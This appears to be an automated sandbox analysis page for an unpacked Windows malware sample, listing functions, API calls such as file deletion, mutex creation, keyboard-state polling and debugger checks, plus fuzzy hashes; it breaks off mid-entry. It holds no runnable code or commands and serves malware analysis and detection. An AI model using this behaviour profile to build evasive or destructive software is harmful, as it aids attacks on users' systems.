                          Function 00401A0D Relevance: 3.0, APIs: 2, Instructions: 16COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1202 401a0d-401c13 call 40c610 1206 401c24-401c2c call 41d2c0 1202->1206 1207 401c15-401c1d 1202->1207 1210 401c3b-401c46 ExitProcess 1206->1210 1211 401c2e-401c35 Wow64DisableWow64FsRedirection 1206->1211 1207->1206 1211->1210
                          APIs
                          • Wow64DisableWow64FsRedirection.KERNEL32(?), ref: 00401C35
                          • ExitProcess.KERNEL32(00000000), ref: 00401C3D
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: Wow64$DisableExitProcessRedirection
                          • String ID:
                          • API String ID: 3835450656-0
                          • Opcode ID: c10fe2623213f26a604cb30112e900d5acca478250b59268a5f20ae2fd1e4891
                          • Instruction ID: a833c8687c560b03d1da3dd21e147f64b3a6ec987c87aaf55bb09993553c3c6f
                          • Opcode Fuzzy Hash: c10fe2623213f26a604cb30112e900d5acca478250b59268a5f20ae2fd1e4891
                          • Instruction Fuzzy Hash: 59E0127444811097DA2CABB0DD89AA97334FB46326F104B7BF225601F0C639D8C48B1D
                          Function 00401A8C Relevance: 3.0, APIs: 2, Instructions: 16COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1212 401a8c-401c13 call 40c610 1216 401c24-401c2c call 41d2c0 1212->1216 1217 401c15-401c1d 1212->1217 1220 401c3b-401c46 ExitProcess 1216->1220 1221 401c2e-401c35 Wow64DisableWow64FsRedirection 1216->1221 1217->1216 1221->1220
                          APIs
                          • Wow64DisableWow64FsRedirection.KERNEL32(?), ref: 00401C35
                          • ExitProcess.KERNEL32(00000000), ref: 00401C3D
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: Wow64$DisableExitProcessRedirection
                          • String ID:
                          • API String ID: 3835450656-0
                          • Opcode ID: 974eadbcea44a21995540378ed3c8b3d6bbab80263cfff2f25aee7855fb1c44f
                          • Instruction ID: a833c8687c560b03d1da3dd21e147f64b3a6ec987c87aaf55bb09993553c3c6f
                          • Opcode Fuzzy Hash: 974eadbcea44a21995540378ed3c8b3d6bbab80263cfff2f25aee7855fb1c44f
                          • Instruction Fuzzy Hash: 59E0127444811097DA2CABB0DD89AA97334FB46326F104B7BF225601F0C639D8C48B1D
                          Function 00401B0B Relevance: 3.0, APIs: 2, Instructions: 16COMMON
                          Download Yara Rule
                          APIs
                          • Wow64DisableWow64FsRedirection.KERNEL32(?), ref: 00401C35
                          • ExitProcess.KERNEL32(00000000), ref: 00401C3D
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: Wow64$DisableExitProcessRedirection
                          • String ID:
                          • API String ID: 3835450656-0
                          • Opcode ID: 04e9c374a8f3f31d335a5705728d381ed82ce052ebd02ed657c38af5408640fb
                          • Instruction ID: a833c8687c560b03d1da3dd21e147f64b3a6ec987c87aaf55bb09993553c3c6f
                          • Opcode Fuzzy Hash: 04e9c374a8f3f31d335a5705728d381ed82ce052ebd02ed657c38af5408640fb
                          • Instruction Fuzzy Hash: 59E0127444811097DA2CABB0DD89AA97334FB46326F104B7BF225601F0C639D8C48B1D
                          Function 00401B2D Relevance: 3.0, APIs: 2, Instructions: 16COMMON
                          Download Yara Rule
                          APIs
                          • Wow64DisableWow64FsRedirection.KERNEL32(?), ref: 00401C35
                          • ExitProcess.KERNEL32(00000000), ref: 00401C3D
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: Wow64$DisableExitProcessRedirection
                          • String ID:
                          • API String ID: 3835450656-0
                          • Opcode ID: 3cbb4a3e08bbc584f3317af269305acf80d860c60903eaee8eb92d9b2fa1221d
                          • Instruction ID: a833c8687c560b03d1da3dd21e147f64b3a6ec987c87aaf55bb09993553c3c6f
                          • Opcode Fuzzy Hash: 3cbb4a3e08bbc584f3317af269305acf80d860c60903eaee8eb92d9b2fa1221d
                          • Instruction Fuzzy Hash: 59E0127444811097DA2CABB0DD89AA97334FB46326F104B7BF225601F0C639D8C48B1D
                          Function 004002AC Relevance: 2.5, APIs: 1, Instructions: 1019synchronizationCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00419140: LoadLibraryW.KERNEL32(NTDLL.DLL), ref: 0041914E
                          • ExitProcess.KERNEL32 ref: 0040103B
                          • _memset.LIBCMT ref: 00401058
                          • Wow64DisableWow64FsRedirection.KERNEL32(?), ref: 004010A0
                          • CreateMutexW.KERNELBASE(0000000C,00000000,0047B18C), ref: 004010D2
                          • OpenEventW.KERNEL32(00100002,00000000,004797F4), ref: 00401116
                          • ExitProcess.KERNEL32 ref: 00401197
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExitProcessWow64$CreateDisableEventLibraryLoadMutexOpenRedirection_memset
                          • String ID:
                          • API String ID: 2030883397-0
                          • Opcode ID: 7bbfeb0b8c1a50f57962939504400496336a30acb12e84be92efcac8acad4660
                          • Instruction ID: a26e70dcc84e3b937f3fed492939267a4b6412feebe7921106151685511d26c9
                          • Opcode Fuzzy Hash: 7bbfeb0b8c1a50f57962939504400496336a30acb12e84be92efcac8acad4660
                          • Instruction Fuzzy Hash: B0E086F49683C05FD201AF71BD556413B347F11281F440075D4D58B5B2D239A6C59759
                          Function 00406080 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: _strlen
                          • String ID:
                          • API String ID: 4218353326-0
                          • Opcode ID: 4a78252a3d50c4f49edb000d43e48ae1fde89e471823e3d2fdb448f0ac22ba3b
                          • Instruction ID: 57871f08ca78a2d2cb45435a79d1a0d85353595e702abf4ec90e96327f8cbcb3
                          • Opcode Fuzzy Hash: 4a78252a3d50c4f49edb000d43e48ae1fde89e471823e3d2fdb448f0ac22ba3b
                          • Instruction Fuzzy Hash: 5F21E9B0924209AFDB04DFA4D841BAF77F5FB48314F00817EE509E7291E7745A98CB99
                          Function 004058C5 Relevance: 1.5, APIs: 1, Instructions: 43threadCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: CreateThreadUser
                          • String ID:
                          • API String ID: 1531140918-0
                          • Opcode ID: 9d825d32468024121c3756d526faa31a86c33974238a552c6b200037977dcc1c
                          • Instruction ID: 81813d2535c41125071dfe0462ffbd7027fcf53a36177536da3d9b1b825c0a0e
                          • Opcode Fuzzy Hash: 9d825d32468024121c3756d526faa31a86c33974238a552c6b200037977dcc1c
                          • Instruction Fuzzy Hash: 39F04F31918D1D9FCF15BB68D805DAEBBB1FB54310F100616E405F3184DA31E4218F85

                          Non-executed Functions

                          Function 00417D70 Relevance: 60.0, APIs: 33, Strings: 1, Instructions: 529threadsynchronizationCOMMON
                          Download Yara Rule
                          APIs
                          • CloseHandle.KERNEL32(?), ref: 00417E07
                          • CloseHandle.KERNEL32(?), ref: 00417E39
                          • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 00417E57
                          • CreateThread.KERNEL32(00000000,00000000,?,-0047C9B0,00000004,00000000), ref: 00417E8C
                          • ResumeThread.KERNEL32(00000000), ref: 00417ECC
                          • CloseHandle.KERNEL32(00000000), ref: 00417EE5
                          • CloseHandle.KERNEL32(00000000), ref: 00417EEF
                          • WaitForSingleObject.KERNEL32(?,00000000), ref: 00417F39
                          • CloseHandle.KERNEL32(?), ref: 00417F71
                          • CloseHandle.KERNEL32(?), ref: 00417FA3
                          • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 00417FC1
                          • CreateThread.KERNEL32(00000000,00000000,?,-0047C9B0,00000004,00000000), ref: 00417FF5
                          • ResumeThread.KERNEL32(00000000), ref: 00418035
                          • ___crtGetLocaleInfoEx.LIBCMTD ref: 004181C7
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseHandle$CreateThread$EventResume$InfoLocaleObjectSingleWait___crt
                          • String ID: d
                          • API String ID: 3049167170-2564639436
                          • Opcode ID: 2f041d12a087f10d211d8f111ce1b92c028ea9d059dddc6fbca995de52eac04e
                          • Instruction ID: ec46aa64586cefb44bc121c17000e6170b7d0ff1991cb480dba2527a1796f028
                          • Opcode Fuzzy Hash: 2f041d12a087f10d211d8f111ce1b92c028ea9d059dddc6fbca995de52eac04e
                          • Instruction Fuzzy Hash: 573243B1A04109DFDB18CF94C888BEEBBB1FB44304F14856EE615AB3D1DB799885CB58
                          Function 00422100 Relevance: 58.9, APIs: 39, Instructions: 351synchronizationCOMMON
                          Download Yara Rule
                          APIs
                          • OpenEventW.KERNEL32(00100000,00000000,004797F4), ref: 00422112
                          • OpenMutexW.KERNEL32(00100000,00000000,00479842), ref: 00422141
                          • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 004221BA
                          • CloseHandle.KERNEL32(?), ref: 00422604
                          • ReleaseMutex.KERNEL32(00000000), ref: 0042261E
                          • CloseHandle.KERNEL32(00000000), ref: 00422628
                          • CloseHandle.KERNEL32(00000000), ref: 00422638
                          • CloseHandle.KERNEL32(00000000), ref: 00422642
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseHandle$EventMutexOpen$CreateRelease
                          • String ID:
                          • API String ID: 3541121777-0
                          • Opcode ID: e6e5146e5d674d16ba72c7733c1277cd3e0aff2f925dd94ed7c9b805ca73fbfa
                          • Instruction ID: 4b62354427e36294d1d22f0316a9effc27a50df354362d9b8fbe57eabd4b792d
                          • Opcode Fuzzy Hash: e6e5146e5d674d16ba72c7733c1277cd3e0aff2f925dd94ed7c9b805ca73fbfa
                          • Instruction Fuzzy Hash: 37E14D70B00214FFDB149FA4EE4DBAE7771BB48315F50852AE605A62E0C7F859C8CB59
                          Function 0041DB70 Relevance: 35.1, APIs: 17, Strings: 3, Instructions: 144memoryfilestringCOMMON
                          Download Yara Rule
                          APIs
                          • WaitForSingleObject.KERNEL32(?,00000000), ref: 0041DB85
                          • LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 0041DB9D
                          • LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 0041DBD2
                          • FindFirstFileW.KERNEL32(00000000,?), ref: 0041DBF0
                          • WaitForSingleObject.KERNEL32(00000000,00000000), ref: 0041DC0F
                          • lstrcmpW.KERNEL32(?,0043969C), ref: 0041DC2D
                          • lstrcmpW.KERNEL32(?,004396A0), ref: 0041DC43
                          • LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 0041DC68
                          • RemoveDirectoryW.KERNEL32(?), ref: 0041DCC4
                          • GetLastError.KERNEL32 ref: 0041DCD6
                          • LocalFree.KERNEL32(?), ref: 0041DCE8
                          • DeleteFileW.KERNEL32(00000000), ref: 0041DD16
                          • FindNextFileW.KERNEL32(000000FF,?), ref: 0041DD27
                          • FindClose.KERNEL32(000000FF), ref: 0041DD39
                          • GetLastError.KERNEL32 ref: 0041DD49
                          • LocalFree.KERNEL32(00000000), ref: 0041DD58
                          • LocalFree.KERNEL32(00000000), ref: 0041DD62
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: Local$AllocFileFindFree$ErrorLastObjectSingleWaitlstrcmp$CloseDeleteDirectoryFirstNextRemove
                          • String ID: %s%s$%s%s\$%s*.*
                          • API String ID: 1956538834-784047915
                          • Opcode ID: a56bc324d6591ed3f6a020122f8c3eb6f4a1c5023e6feb158143234c9c72617f
                          • Instruction ID: a8785c28ed827b9a64c5c1a3895a20f9f256fbcf8a37a1f4dbc80d81155661f4
                          • Opcode Fuzzy Hash: a56bc324d6591ed3f6a020122f8c3eb6f4a1c5023e6feb158143234c9c72617f
                          • Instruction Fuzzy Hash: D5517FB5A04209EBCB14EFA4DD8DBEA7779FF48301F1045A9F60997290D778A980CF58
                          Function 00420AB0 Relevance: 25.7, APIs: 17, Instructions: 168memoryCOMMON
                          Download Yara Rule
                          APIs
                          • LocalAlloc.KERNEL32(00000040,00000000), ref: 00420AE8
                          • und_memcpy.LIBCMTD ref: 00420B0D
                          • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 00420B1D
                          • wsprintfW.USER32 ref: 00420B59
                          • GetForegroundWindow.USER32(?), ref: 00420B72
                          • SetWindowTextW.USER32(00000000), ref: 00420B79
                          • LocalFree.KERNEL32(00000000), ref: 00420BD3
                          • CloseHandle.KERNEL32(00000000), ref: 00420BDD
                          • LocalFree.KERNEL32(00000000), ref: 00420C0A
                          • CloseHandle.KERNEL32(00000000), ref: 00420C14
                          • ___crtGetLocaleInfoEx.LIBCMTD ref: 00420C3A
                          • LocalFree.KERNEL32(00000000), ref: 00420C59
                          • CloseHandle.KERNEL32(00000000), ref: 00420C63
                          • CloseHandle.KERNEL32(00000000), ref: 00420CC5
                          • LocalFree.KERNEL32(00000000), ref: 00420CCF
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: Local$CloseFreeHandle$Window$AllocCreateEventForegroundInfoLocaleText___crtund_memcpywsprintf
                          • String ID:
                          • API String ID: 1168742068-0
                          • Opcode ID: a9665ef2fd3f3a9d1704eee2cfc6d8e8ab9175ce289b116dd73683be853bcc80
                          • Instruction ID: dd28a540914ffa5139adb5b01d37b93b9a8ff240ad12196941be41d739b6b553
                          • Opcode Fuzzy Hash: a9665ef2fd3f3a9d1704eee2cfc6d8e8ab9175ce289b116dd73683be853bcc80
                          • Instruction Fuzzy Hash: 94714FB4A04209EFCB14DF94E948BEEBBB4FF48305F108659EA15A7381C778AA45CF54
                          Function 004208A0 Relevance: 24.2, APIs: 16, Instructions: 162memoryCOMMON
                          Download Yara Rule
                          APIs
                          • LocalAlloc.KERNEL32(00000040,00000000), ref: 004208D5
                          • und_memcpy.LIBCMTD ref: 004208FA
                          • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 0042090A
                          • LocalFree.KERNEL32(00000000), ref: 00420977
                          • CloseHandle.KERNEL32(00000000), ref: 00420981
                          • LocalFree.KERNEL32(00000000), ref: 004209A6
                          • CloseHandle.KERNEL32(00000000), ref: 004209B0
                          • CloseHandle.KERNEL32(00000000), ref: 00420A98
                          • LocalFree.KERNEL32(00000000), ref: 00420AA2
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: Local$CloseFreeHandle$AllocCreateEventund_memcpy
                          • String ID:
                          • API String ID: 1832378476-0
                          • Opcode ID: c0437896914665ae833224e6cf5b13284bd79414798874605a2f9944287931af
                          • Instruction ID: 238fbec80c250b7923099f22145295008854e0298cd58d4bd81cb5720764c8b3
                          • Opcode Fuzzy Hash: c0437896914665ae833224e6cf5b13284bd79414798874605a2f9944287931af
                          • Instruction Fuzzy Hash: 81614D74A00209EFCB14CFA4D949BEEBBB4FF48304F508159EA15A7381C738AA45CF94
                          Function 00420CE0 Relevance: 21.2, APIs: 14, Instructions: 154memoryCOMMON
                          Download Yara Rule
                          APIs
                          • LocalAlloc.KERNEL32(00000040,00000000), ref: 00420D15
                          • und_memcpy.LIBCMTD ref: 00420D3A
                          • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 00420D4A
                          • LocalFree.KERNEL32(00000000), ref: 00420DB7
                          • CloseHandle.KERNEL32(00000000), ref: 00420DC1
                          • LocalFree.KERNEL32(00000000), ref: 00420DE6
                          • CloseHandle.KERNEL32(00000000), ref: 00420DF0
                          • CloseHandle.KERNEL32(00000000), ref: 00420EBD
                          • LocalFree.KERNEL32(00000000), ref: 00420EC7
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: Local$CloseFreeHandle$AllocCreateEventund_memcpy
                          • String ID:
                          • API String ID: 1832378476-0
                          • Opcode ID: 72de49ab070d0855317d2ae24b32e4c164f03b9f9af2a54e41da1b4bb19c17a5
                          • Instruction ID: 84c965324fae4c90f16cd7a5d024afcab81d1cdef434bd8de29a62c46187d57c
                          • Opcode Fuzzy Hash: 72de49ab070d0855317d2ae24b32e4c164f03b9f9af2a54e41da1b4bb19c17a5
                          • Instruction Fuzzy Hash: C2616E74A00219EFCB14DFA4E949BEEBBB5FF48304F108559EA15A7381C738A985CF94
                          Function 00420EE0 Relevance: 18.1, APIs: 12, Instructions: 144memoryCOMMON
                          Download Yara Rule
                          APIs
                          • LocalAlloc.KERNEL32(00000040,00000000), ref: 00420F15
                          • und_memcpy.LIBCMTD ref: 00420F3A
                          • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 00420F4A
                          • LocalFree.KERNEL32(00000000), ref: 00420FC3
                          • CloseHandle.KERNEL32(00000000), ref: 00420FCD
                          • LocalFree.KERNEL32(00000000), ref: 00420FFA
                          • CloseHandle.KERNEL32(00000000), ref: 00421004
                          • ___crtGetLocaleInfoEx.LIBCMTD ref: 00421026
                          • LocalFree.KERNEL32(00000000), ref: 00421078
                          • CloseHandle.KERNEL32(00000000), ref: 00421082
                          • CloseHandle.KERNEL32(00000000), ref: 0042109A
                          • LocalFree.KERNEL32(00000000), ref: 004210A4
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: Local$CloseFreeHandle$AllocCreateEventInfoLocale___crtund_memcpy
                          • String ID:
                          • API String ID: 1193138003-0
                          • Opcode ID: 61a4a398a4dfdbca18395684b1accd05abc16e4ff97bb353428f0b8f0145af52
                          • Instruction ID: 51dc9425620134e15ff5e2344ba80fe2df1834fe2a4062b14902e29be8b06d81
                          • Opcode Fuzzy Hash: 61a4a398a4dfdbca18395684b1accd05abc16e4ff97bb353428f0b8f0145af52
                          • Instruction Fuzzy Hash: 74518274E00219EFCB14DFA4E948BAEBBB4FF48304F108159EA15A7390C778A985CF59
                          Function 00407280 Relevance: 16.6, APIs: 6, Strings: 3, Instructions: 840COMMON
                          Download Yara Rule
                          APIs
                          • _memset.LIBCMT ref: 004072BF
                            • Part of subcall function 00418A30: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00414506,00436450), ref: 00418A59
                          • _memset.LIBCMT ref: 0040730A
                            • Part of subcall function 00418A30: _memmove.LIBCMT ref: 00418A88
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: _memset$_memmovelstrlen
                          • String ID: PT%dS$PT0S$default
                          • API String ID: 3502740365-2476591505
                          • Opcode ID: af3ac5dbcbf2901f0bfdeb678b64e62f9a825beed46d3ec4881f38901028f9dc
                          • Instruction ID: ce44bb1052d4145eeff6889e18c016f7d7dc6c7cacb71b6e9c991632b859b78d
                          • Opcode Fuzzy Hash: af3ac5dbcbf2901f0bfdeb678b64e62f9a825beed46d3ec4881f38901028f9dc
                          • Instruction Fuzzy Hash: EF92F574A04619DFCB64DF14CC84B99B7B5AF88304F1082EAE50DA73A0DB35AE81CF55
                          Function 00421700 Relevance: 10.6, APIs: 7, Instructions: 124memoryCOMMON
                          Download Yara Rule
                          APIs
                          • LocalAlloc.KERNEL32(00000040,000003F0,?,?,?,?,?,?,?,?,00421576,?), ref: 00421742
                          • wsprintfA.USER32 ref: 00421790
                          • ___crtGetLocaleInfoEx.LIBCMTD ref: 004217D1
                          • ___crtGetLocaleInfoEx.LIBCMTD ref: 0042180A
                          • und_memcpy.LIBCMTD ref: 0042183A
                          • LocalFree.KERNEL32(00000000), ref: 00421846
                          • LocalFree.KERNEL32(00000000), ref: 00421854
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: Local$FreeInfoLocale___crt$Allocund_memcpywsprintf
                          • String ID:
                          • API String ID: 573794981-0
                          • Opcode ID: 09e864ce7370a8d46b35f0e12868df88d5ec713e090bcc57874a64dee3c3d77e
                          • Instruction ID: d4ee76e6c914feda94d9d877a3cccb2607968a9df67d6c93f36d2a086787deb9
                          • Opcode Fuzzy Hash: 09e864ce7370a8d46b35f0e12868df88d5ec713e090bcc57874a64dee3c3d77e
                          • Instruction Fuzzy Hash: BC415FB5E00219AFCB04DF94D881ABFBBB5FF98304F14854DE609A7351D635A941CBA4
                          Function 00421A20 Relevance: 9.2, APIs: 6, Instructions: 247COMMON
                          Download Yara Rule
                          APIs
                          • ___crtGetLocaleInfoEx.LIBCMTD ref: 00421A3D
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: InfoLocale___crt
                          • String ID:
                          • API String ID: 3761071962-0
                          • Opcode ID: aee39f4793dd6efacc8bfe94317fd393fa5a05ae3d136c3ddc80eaf08b1b96b3
                          • Instruction ID: 0f41a721227a78baec1e3b4351c12b98976e287611a93d31967cef47b8d17757
                          • Opcode Fuzzy Hash: aee39f4793dd6efacc8bfe94317fd393fa5a05ae3d136c3ddc80eaf08b1b96b3
                          • Instruction Fuzzy Hash: 7FB14F74A00218DFCB24CF94E994BDDBBB1FF58308F60811AE905AB394D779A986CF45
                          Function 00421DA0 Relevance: 9.2, APIs: 6, Instructions: 239COMMON
                          Download Yara Rule
                          APIs
                          • ___crtGetLocaleInfoEx.LIBCMTD ref: 00421DBD
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: InfoLocale___crt
                          • String ID:
                          • API String ID: 3761071962-0
                          • Opcode ID: 3cd93d966e497bfb57ae1ef21dace33f0b8971bc2c1097af13e1f0d569e376ff
                          • Instruction ID: 57d306131c6df6584980f38f22f081f6ded00a43f19351454401da55e8b5c5b4
                          • Opcode Fuzzy Hash: 3cd93d966e497bfb57ae1ef21dace33f0b8971bc2c1097af13e1f0d569e376ff
                          • Instruction Fuzzy Hash: 21B12F70A00218EFDB14CF84E984BAEB7B1FF58308F60815AE905A7394C7B9AD85CF45
                          Function 004215C0 Relevance: 9.1, APIs: 6, Instructions: 113memoryCOMMON
                          Download Yara Rule
                          APIs
                          • LocalAlloc.KERNEL32(00000040,000003F0,?,?,?,?,?,?,?,0042150F,?), ref: 00421602
                          • ___crtGetLocaleInfoEx.LIBCMTD ref: 0042166D
                          • ___crtGetLocaleInfoEx.LIBCMTD ref: 004216A6
                          • und_memcpy.LIBCMTD ref: 004216D6
                          • LocalFree.KERNEL32(00000000), ref: 004216E2
                          • LocalFree.KERNEL32(00000000), ref: 004216F0
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: Local$FreeInfoLocale___crt$Allocund_memcpy
                          • String ID:
                          • API String ID: 1193788099-0
                          • Opcode ID: 1282fa304bbfc87acd26351ccb1f38f00b7fdd73e2f2856893c1dd7c46bc59a9
                          • Instruction ID: 5bac126bd23974c04984f3e5f5f0ee040623d58c1044a77f072663fefbf3ada1
                          • Opcode Fuzzy Hash: 1282fa304bbfc87acd26351ccb1f38f00b7fdd73e2f2856893c1dd7c46bc59a9
                          • Instruction Fuzzy Hash: 2C4171B4E00219AFCB04DF94D981EBFB7B5BF98300F648549E909A7342D635EA41CBA5
                          Function 004290CF Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • IsDebuggerPresent.KERNEL32 ref: 0042D630
                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0042D645
                          • UnhandledExceptionFilter.KERNEL32(0043AEE0), ref: 0042D650
                          • GetCurrentProcess.KERNEL32(C0000409), ref: 0042D66C
                          • TerminateProcess.KERNEL32(00000000), ref: 0042D673
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                          • String ID:
                          • API String ID: 2579439406-0
                          • Opcode ID: 0335d1d99c6a3edca7eeeced85f5ff9b16a31f1680bcacd78d866e4256513115
                          • Instruction ID: d859bb3f44c2e61071292196ca601b336e19eaa722fa04b4b4e3a13c6ceac289
                          • Opcode Fuzzy Hash: 0335d1d99c6a3edca7eeeced85f5ff9b16a31f1680bcacd78d866e4256513115
                          • Instruction Fuzzy Hash: 462102F5922308DFE784EF24F889A493BB0BB58300F50586EE80987761D7B459888F4D
                          Function 00413200 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 140sleepkeyboardCOMMON
                          Download Yara Rule
                          APIs
                          • GetAsyncKeyState.USER32(0000001B), ref: 004133F5
                            • Part of subcall function 00418A30: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00414506,00436450), ref: 00418A59
                          • Sleep.KERNEL32(000003E8), ref: 00413446
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: AsyncSleepStatelstrlen
                          • String ID: `CL`C
                          • API String ID: 1450562213-1431644962
                          • Opcode ID: 6be960fdff3c90a2a9132d39e79fb053b5185120e176c89ef64004096ca10001
                          • Instruction ID: 5dc7b231b24de6de9191f165a7941ff6f2d8c14447f93dc5e099c59aa51a6bfd
                          • Opcode Fuzzy Hash: 6be960fdff3c90a2a9132d39e79fb053b5185120e176c89ef64004096ca10001
                          • Instruction Fuzzy Hash: CF7114B0900328DBDB25DF10DD89BD9B7B0BB49309F1081EADA4D66280DB795BC9CF59
                          Function 00405710 Relevance: 4.5, APIs: 3, Instructions: 11memoryCOMMON
                          Download Yara Rule
                          APIs
